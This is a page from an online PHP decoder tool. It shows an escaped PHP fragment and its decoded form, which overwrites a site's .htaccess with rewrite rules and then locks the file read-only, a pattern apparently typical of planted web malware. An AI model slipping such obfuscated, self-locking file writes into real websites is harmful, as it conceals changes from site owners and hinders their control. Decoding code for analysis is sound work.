Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
\74\x49\146\115\x6f\144\x75\154\x65\x20\155\157\x64\137\x72\x65\x77\162\151\x74\145\x2e\14..
Decoded Output download
<? <IfModule mod_rewrite.c>" . PHP_EOL; $text .= "RewriteEngine On" . PHP_EOL; $text .= "RewriteCond %{REQUEST_FILENAME} !-f" . PHP_EOL; $text .= "RewriteCond %{REQUEST_FILENAME} !-d" . PHP_EOL; $text .= "RewriteRule ^(.*)$ index.php/$1 [L]" . PHP_EOL; $text .= "</IfModule>" . PHP_EOL; if (file_exists($path)) { @chmod($path, 511); } if (@file_put_contents($path, $text) > 0) { @chmod($path, 292); return array("code" => 200, "msg" => "htaccess ok") ?>
Did this file decode correctly?
Original Code
\74\x49\146\115\x6f\144\x75\154\x65\x20\155\157\x64\137\x72\x65\x77\162\151\x74\145\x2e\143\76" . PHP_EOL; $text .= "\122\x65\x77\162\151\x74\x65\105\156\147\x69\156\145\40\x4f\x6e" . PHP_EOL; $text .= "\x52\x65\x77\162\151\164\145\x43\157\x6e\144\40\45\x7b\122\x45\x51\125\x45\123\124\137\x46\x49\114\x45\116\101\x4d\x45\x7d\40\41\55\x66" . PHP_EOL; $text .= "\122\x65\x77\x72\151\x74\145\x43\157\156\x64\x20\45\x7b\122\x45\x51\125\105\123\124\137\x46\111\x4c\x45\116\x41\x4d\105\175\x20\x21\x2d\144" . PHP_EOL; $text .= "\x52\145\167\162\x69\x74\145\x52\x75\154\x65\x20\x5e\x28\56\x2a\x29\44\40\x69\x6e\144\145\x78\x2e\x70\x68\160\x2f\44\61\x20\133\114\135" . PHP_EOL; $text .= "\x3c\57\x49\146\x4d\157\x64\165\x6c\145\x3e" . PHP_EOL; if (file_exists($path)) { @chmod($path, 511); } if (@file_put_contents($path, $text) > 0) { @chmod($path, 292); return array("\x63\157\144\145" => 200, "\155\163\147" => "\x68\164\x61\x63\143\x65\x73\x73\40\x6f\153")
Function Calls
None |
Stats
MD5 | 0af6b76247cd30f24047a5811de0eaac |
Eval Count | 0 |
Decode Time | 46 ms |